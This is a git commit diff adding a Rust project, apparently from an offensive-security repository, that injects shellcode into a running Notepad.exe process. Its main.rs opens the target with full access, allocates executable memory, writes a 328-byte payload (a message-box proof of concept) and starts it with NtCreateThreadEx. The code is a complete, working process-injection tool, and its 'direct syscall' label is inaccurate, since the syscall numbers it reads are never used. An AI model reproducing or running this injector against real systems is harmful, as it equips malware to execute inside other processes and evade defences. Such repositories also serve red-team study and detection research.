Syscalls

Whitecat18 · Whitecat18 · commit bcf8bafbffb5 · 2024-12-10T23:15:42.000+05:30
Direct Syscalls
diff --git a/syscalls/direct_syscalls/Cargo.toml b/syscalls/direct_syscalls/Cargo.toml
@@ -0,0 +1,8 @@
+[package]
+name = "direct_syscalls"
+version = "0.1.0"
+edition = "2021"
+
+[dependencies]
+winapi = { version = "0.3.9", features = ["winuser","setupapi","dbghelp","wlanapi","winnls","wincon","fileapi","sysinfoapi", "fibersapi","debugapi","winerror", "wininet" , "winhttp" ,"synchapi","securitybaseapi","wincrypt","psapi", "tlhelp32", "heapapi","shellapi", "memoryapi", "processthreadsapi", "errhandlingapi", "winbase", "handleapi", "synchapi"] }
+ntapi = "0.4.1"
diff --git a/syscalls/direct_syscalls/README.md b/syscalls/direct_syscalls/README.md
@@ -0,0 +1,16 @@
+## Direct Syscalls 
+
+![Direct Syscalls](./direct_syscalls.png)
+
+### Working Methodology 
+
+Uses ntdll.dll and GetProcAddress to fetch syscall numbers for injection.
+
+Allocates memory in the target process, writes shellcode, and executes it using NtCreateThreadEx.
+
+## Credits 
+
+* https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls
+* https://www.ired.team/offensive-security/code-injection-process-injection/ntcreatesection-+-ntmapviewofsection-code-injection
+
+By [@5mukx](https://x.com/5mukx)
diff --git a/syscalls/direct_syscalls/direct_syscalls.png b/syscalls/direct_syscalls/direct_syscalls.png
diff --git a/syscalls/direct_syscalls/src/main.rs b/syscalls/direct_syscalls/src/main.rs
@@ -0,0 +1,217 @@
+/*
+    Direct Syscalls
+    Author: @5mukx 
+*/
+use std::ffi::{CString, OsString};
+use std::ptr::null_mut;
+use std::os::windows::ffi::OsStrExt;
+
+use ntapi::ntmmapi::{NtAllocateVirtualMemory, NtWriteVirtualMemory};
+use ntapi::ntpsapi::NtCreateThreadEx;
+use winapi::ctypes::c_void;
+use winapi::shared::ntstatus::STATUS_SUCCESS;
+use winapi::um::errhandlingapi::GetLastError;
+use winapi::um::handleapi::CloseHandle;
+use winapi::um::libloaderapi::{GetModuleHandleW, GetProcAddress};
+use winapi::um::processthreadsapi::OpenProcess;
+use winapi::um::tlhelp32::{CreateToolhelp32Snapshot, Process32First, Process32Next, PROCESSENTRY32, TH32CS_SNAPPROCESS};
+
+// wide string into cosnt *u16 (eg. ntdll.dll)
+fn wide_string(s: &str) -> Vec<u16>{
+    OsString::from(s).encode_wide().chain(std::iter::once(0)).collect()
+}
+
+fn get_ssn(function_name: &str) -> Option<u32>{
+    unsafe{
+        let module_name = GetModuleHandleW(
+            wide_string("ntdll.dll").as_ptr()
+        );
+
+        if module_name.is_null(){
+            println!("Failed to load ntdll.dll");
+            return None;
+        }
+
+        let proc_name = {
+            CString::new(function_name).unwrap()
+        };
+
+        let func_address = GetProcAddress(
+            module_name,
+            // proc_name.as_ptr()
+            proc_name.as_ptr()
+        );
+
+        if func_address.is_null(){
+            println!("Failed to find {:?}", func_address);
+            return None;
+        }
+
+        Some(*(func_address.offset(4) as *const u8) as u32)
+    }
+}
+
+// new method to get pid by its name
+fn get_pid(process_name: &str) -> u32{
+    unsafe{
+        let mut pe: PROCESSENTRY32 = std::mem::zeroed();
+        pe.dwSize = std::mem::size_of::<PROCESSENTRY32>() as u32;
+
+        let snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+        if snap.is_null(){
+            println!("Error while snapshoting processes : Error : {}",GetLastError());
+            std::process::exit(0);
+        }
+
+        let mut pid = 0;
+
+        let mut result = Process32First(snap, &mut pe) != 0;
+
+        while result{
+
+            let exe_file = CString::from_vec_unchecked(pe.szExeFile
+                .iter()
+                .map(|&file| file as u8)
+                .take_while(|&c| c!=0)
+                .collect::<Vec<u8>>(),
+            );
+
+            if exe_file.to_str().unwrap() == process_name {
+                pid = pe.th32ProcessID;
+                break;
+            }
+            result = Process32Next(snap, &mut pe) !=0;
+        }
+
+        if pid == 0{
+            println!("Unable to get PID for {}: {}",process_name , "PROCESS DOESNT EXISTS");           
+            std::process::exit(0);
+        }
+    
+        CloseHandle(snap);
+        pid
+    }
+}
+
+// direct syscall injection
+fn direct_syscall_injector(payload: &[u8], process_name: &str) -> Result<(), String>{
+    unsafe{
+        // testing windows 10 => notepad.exe win11 => Notepad.exe
+        let target_pid = get_pid(process_name);
+
+        let process = OpenProcess(
+            0x000F0000 | 0x00100000 | 0xFFFF, //PROCESS_ALL_ACCESS,
+            0,
+            target_pid,
+        );
+
+        if process.is_null(){
+            return Err("Failed to open target process".to_string());
+        }
+
+        let mut remote_buffer: *mut c_void = null_mut();
+        let alloc_size = payload.len();
+
+        let nt_allocate_virtual_memory = get_ssn("NtAllocateVirtualMemory").unwrap();
+        println!("SSN for NtAllocateVirtualMemory: {}", nt_allocate_virtual_memory);
+        
+        let nt_allocate_status = NtAllocateVirtualMemory(
+            process,
+            &mut remote_buffer as *mut _ as *mut _,
+            0,
+            &mut (alloc_size as usize) as *mut usize,
+            0x2000 | 0x1000, // MEM_RESERVE || MEM_COMMIT
+            0x40 // PAGE_EXECUTE_READWRITE,  
+        );
+
+        if nt_allocate_status != 0x00000000{
+            return Err("NtAllocateVirtualMemory failed".to_string());
+        }
+
+        println!("Allocation status: {}", nt_allocate_status);
+
+        let mut bytes_written = 0;
+        let nt_write_virtual_memory = get_ssn("NtWriteVirtualMemory").unwrap();
+        println!("SSN for NtWriteVirtualMemory: {}", nt_write_virtual_memory);
+
+        let nt_write_status = NtWriteVirtualMemory(
+            process,
+            remote_buffer,
+            payload.as_ptr() as *mut c_void,
+            payload.len(),
+            &mut bytes_written,
+        );
+
+        println!("NtWriteVirtualMemory mapping address: {:?}", nt_write_status);
+
+        if nt_write_status != 0x00000000 {
+            return Err("NtWriteVirtualMemory failed".to_string());
+        }
+
+        let mut h_thread: *mut c_void = null_mut();
+        let nt_create_thread_ex = get_ssn("NtCreateThreadEx").unwrap();
+        println!("SSN for NtCreateThreadEx: {}", nt_create_thread_ex);
+
+
+        let nt_create_status = NtCreateThreadEx(
+            &mut h_thread,
+            winapi::um::winnt::THREAD_ALL_ACCESS,
+            null_mut(),
+            process,
+            std::mem::transmute(remote_buffer),
+            null_mut(),
+            0,
+            0,
+            0,
+            0,
+            null_mut(),
+        );
+
+        if nt_create_status != STATUS_SUCCESS {
+            return Err("NtCreateThreadEx failed".to_string());
+        }
+
+        println!("Created Thread: {}", nt_create_status);
+
+        Ok(())
+    }
+}
+
+fn main(){
+    let payload:[u8; 328] = [0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,
+    0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
+    0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,
+    0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,
+    0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
+    0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
+    0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,
+    0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,
+    0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,
+    0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
+    0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,
+    0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,
+    0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,
+    0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,
+    0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,
+    0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,
+    0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,
+    0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,
+    0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x3e,
+    0x48,0x8d,0x8d,0x30,0x01,0x00,0x00,0x41,0xba,0x4c,0x77,0x26,
+    0x07,0xff,0xd5,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,
+    0x8d,0x95,0x0e,0x01,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x24,0x01,
+    0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
+    0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,
+    0x48,0x65,0x79,0x20,0x6d,0x61,0x6e,0x2e,0x20,0x49,0x74,0x73,
+    0x20,0x6d,0x65,0x20,0x53,0x6d,0x75,0x6b,0x78,0x00,0x6b,0x6e,
+    0x6f,0x63,0x6b,0x2d,0x6b,0x6e,0x6f,0x63,0x6b,0x00,0x75,0x73,
+    0x65,0x72,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00 ];
+
+    let process_name = "Notepad.exe";
+
+    match direct_syscall_injector(&payload, &process_name) {
+        Ok(_) => println!("Injection Successful"),
+        Err(e) => eprintln!("Injection failed: {}", e),
+    }
+
+}
